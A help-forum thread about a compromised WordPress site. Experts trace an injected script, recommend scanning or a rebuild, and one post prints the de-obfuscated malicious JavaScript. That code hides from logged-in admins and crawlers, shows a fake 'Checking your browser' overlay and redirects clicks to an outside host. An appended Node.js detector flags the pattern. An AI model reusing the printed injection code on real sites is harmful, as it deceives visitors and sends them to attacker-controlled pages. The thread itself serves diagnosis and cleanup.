php website

I have a website www.saberpoint.com. Suddenly something happened to the WordPress website and the menu started showing on the top. We came to know our site got compromised, and we are trying to fix this. Can someone help me out to see what is wrong in the page?
romeiovasu Asked:
Jim Horn (SQL Server Data Dude) Commented:
Curiosity overwhelms me ... Are you asking experts here to navigate to a site that is 'compromised', and if so, define 'compromised' for us.
romeiovasu (Author) Commented:
No, the compromised one got fixed. Now we are asking: is there anything we can fix in the CSS sheet?
Rob (Owner, Aidellio) Commented:
That's not something you'll get a lot of attention on as none of us want our computers compromised.  I've opened the page in incognito, which still isn't ideal but it was enough to show that:

http://cdn.callrail.com/companies/225762002/7ea1c4ca77e56aef53dd/12/swap.js

is the script causing your issues.  You'll find it included at the bottom of the page.  

WARNING to other experts: It creates tracking cookies and referrer cookies to obviously read when you click through to "check your browser"

But the real issue here is how it got there in the first place. Does your site allow for content to be entered in any way? How do you parse, filter and sanitize your input?

You should be reviewing all your code that accepts any kind of input with reference to filtering in PHP (including sanitization and validation): http://php.net/manual/en/book.filter.php


Rob (Owner, Aidellio) Commented:
"no the compromised one is got fixed"
Not http://www.saberpoint.com/. That IS still compromised.

romeiovasu (Author) Commented:
Hi Rob,

I didn't understand what you are saying. If you don't mind, can you explain to me in more detail, please?
Maclean (System Engineer) Commented:
The problem here is that you won't know which files have been compromised, or which port or which vulnerability was exploited. As far as I can see you have malware running on it right now which was injected via JavaScript vulnerabilities, and it might be best to take it offline to minimize loss of data if they are harvesting information using the vulnerability.

Personally I would be tempted to build a clean new server, make sure it is patched and secured.
You could try running a rootkit scanner on it or a malware sweep. ClamAV is often used to locate malware on Linux.

Unfortunately my expertise does not go much beyond this, and it would be best getting a professional opinion added to resolve your issue in full.

I found some info running a free scan for vulnerabilities here

Result =
Known javascript malware. Details: http://sucuri.net/malware/entry/MW:JS:GEN2?web.js.script-injection.003
Rob (Owner, Aidellio) Commented:
Sorry, just remembered you mentioned it's a WordPress site. Are you on the latest version of WordPress? Are all your plugins and themes up to date? Any one of these elements could have a vulnerability that exposed your site.
Rob (Owner, Aidellio) Commented:
I agree with Maclean, you need a professional to sift through this or start from scratch on another server.   If you've got a lot of content then starting from scratch is going to be a pain.

The "malware" will most likely be in your database and injected by a malicious user so scanning your server will most likely turn up nothing.

Please refer to section 5 of my article below that has some information relating to cross site scripting and SQL/JS injection:
http://www.experts-exchange.com/articles/12871/Avoiding-mailto-and-how-to-capture-a-web-enquiry.html

I found that js script by looking at the source code of the page.
Maclean (System Engineer) Commented:
According to redbot you are using the PHP/5.4.45 engine.
This one has various vulnerabilities as it is behind in patch levels by about 2-3 months.

https://msisac.cisecurity.org/advisories/2015/2015-105.cfm
https://www.exploit-db.com/exploits/38123/

So I would say that the likely cause was not having patched the web server frequently.

I will leave things with Rob and others however, he seems to have a good knowledge on these problems.
Jason C. Levine (Don't talk to me.) Commented:
Once a WordPress site has been compromised, you have to take a LOT of steps to make sure it is clean again. Maclean posted the link to Sucuri, which will scan the front-facing site for obvious vulnerabilities but there may be other, non-obvious backdoors now in your installation.  This article:

http://www.experts-exchange.com/articles/10806/Detecting-Recovering-From-and-Preventing-WordPress-Site-Hacks.html

talks about steps you can take to attempt to recover but if you are not familiar with WordPress hacks and overall security issues, pay Sucuri to clean you up.
Scott Fell (Developer & EE Moderator) Commented:
Not fixed yet. See line 451 (when you view source).

The code is on one line, but here I have expanded it.
function start() {
    function t(e) {
        var t = document.cookie,
            n = t.indexOf(" " + e + "=");
        n == -1 && (n = t.indexOf(e + "="));
        if (n == -1) t = null;
        else {
            n = t.indexOf("=", n) + 1;
            var r = t.indexOf(";", n);
            r == -1 && (r = t.length), t = unescape(t.substring(n, r))
        }
        return t
    }

    function n(e, t, n) {
        var r = new Date;
        r.setDate(r.getDate() + n);
        var i = escape(t) + (n == null ? "" : "; expires=" + r.toUTCString());
        document.cookie = e + "=" + i
    }

    function r() {
        return document.cookie ? document.cookie.indexOf("wordpress_logged") !== -1 || document.cookie.indexOf("wp-settings") !== -1 || document.cookie.indexOf("referrerRedirectCookie") !== -1 || document.cookie.indexOf("wordpress_test") !== -1 ? (console.log("true"), !0) : (console.log("false2"), !1) : (console.log("false1"), !1)
    }
    if (!r()) {
        n("referrerRedirectCookie", "do not redirect", 730);
        var e = navigator.userAgent;
        if (!e || e.length == 0) return;
        e = e.toLowerCase(), e.indexOf("google") == -1 && e.indexOf("bot") == -1 && e.indexOf("crawl") == -1 && hideWebSite()
    }
}

function createPopup() {
    var e = document.createElement("div");
    e.style.position = "absolute", e.style.width = "100%", e.style.height = "100%", e.style.left = 0, e.style.top = 0, e.style.backgroundColor = "white", e.style.zIndex = 99999, document.body.appendChild(e), e.onclick = function() {
        window.location = w_location
    };
    var t = document.createElement("p");
    return t.innerText = "Checking your browser before accessing " + window.location.host + "...", t.style.textAlign = "center", t.style.fontSize = "x-large", t.style.position = "relative", t.textContent = t.innerText, e.appendChild(t), e
}

function createButton() {
    var e = document.createElement("div");
    return e.style.position = "absolute", e.style.top = "20%", e.style.left = "10%", e.style.right = "10%", e.style.width = "80%", e.style.border = "1px solid black", e.style.textAlign = "center", e.style.verticalAlign = "middle", e.style.margin = "0, auto", e.style.cursor = "pointer", e.style.fontSize = "xx-large", e.style.borderRadius = "5px", e.onclick = function() {
        window.location = w_location
    }, e.onmouseover = function() {
        e.style.border = "1px solid red", e.style.color = "red"
    }, e.onmouseout = function() {
        e.style.border = "1px solid black", e.style.color = "black"
    }, e.innerText = "Continue", e.textContent = e.innerText, e
}
var w_location = "http://default72.com",
    hideWebSite = function() {
        var e = createPopup(),
            t = createButton();
        e.appendChild(t)
    },
    readyStateCheckInterval = setInterval(function() {
        if (document.readyState === "complete" || document.readyState == "interactive") clearInterval(readyStateCheckInterval), start()
    }, 10);

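An added example, not code from the thread: a small Node.js detector for the injection pattern Scott shows above, which flags external script sources from hosts other than the site's own and inline scripts carrying markers from the overlay/redirect code. It runs over a saved page source or over post_content rows exported from the WordPress database (where Rob expects the injection to live); the allowlisted hosts and the sample HTML are assumptions constructed for the example.

```javascript
// Added example (not from the thread): scan HTML for the injected-script pattern
// discussed above. Works on saved page source or on post_content exported from
// the WordPress database, since the injected markup is the same in both places.

// Assumption: the site's own hostnames; adjust for your deployment.
const ALLOWED_SCRIPT_HOSTS = new Set(["www.saberpoint.com", "saberpoint.com"]);
const BASE_URL = "http://www.saberpoint.com/"; // resolves relative src values

// Markers taken from the injected script shown in Scott's post.
const INLINE_MARKERS = [
  { name: "overlay-text", re: /Checking your browser before accessing/i },
  { name: "redirect-cookie", re: /referrerRedirectCookie/ },
  { name: "hideWebSite", re: /hideWebSite\s*=/ },
  { name: "readystate-poll", re: /readyStateCheckInterval/ },
];

function scanHtml(html) {
  const findings = [];
  const scriptRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const [, attrs, body] = m;
    const src = /\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(attrs);
    if (src) {
      let host = null;
      try { host = new URL(src[1], BASE_URL).host; } catch (e) { /* unparsable: treat as foreign */ }
      if (!host || !ALLOWED_SCRIPT_HOSTS.has(host)) {
        findings.push({ kind: "external-script", src: src[1], host });
      }
    } else {
      const hit = INLINE_MARKERS.find((mk) => mk.re.test(body));
      if (hit) findings.push({ kind: "inline-marker", marker: hit.name });
    }
  }
  return findings;
}

// Constructed sample: a benign theme script, the foreign script Rob identified,
// and an inline copy of the overlay code from Scott's post.
const SAMPLE_HTML = [
  '<script src="/wp-content/themes/demo/js/theme.js"></script>',
  '<script src="http://cdn.callrail.com/companies/225762002/7ea1c4ca77e56aef53dd/12/swap.js"></script>',
  '<script>var w_location="http://default72.com",hideWebSite=function(){},',
  'readyStateCheckInterval=setInterval(start,10);</script></body></html>',
].join("\n");

for (const f of scanHtml(SAMPLE_HTML)) console.log(JSON.stringify(f));
```

Every hit should be reviewed in the database row or template file it came from; a clean scan does not prove the site is clean, which is why the thread recommends a professional cleanup or a rebuild.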
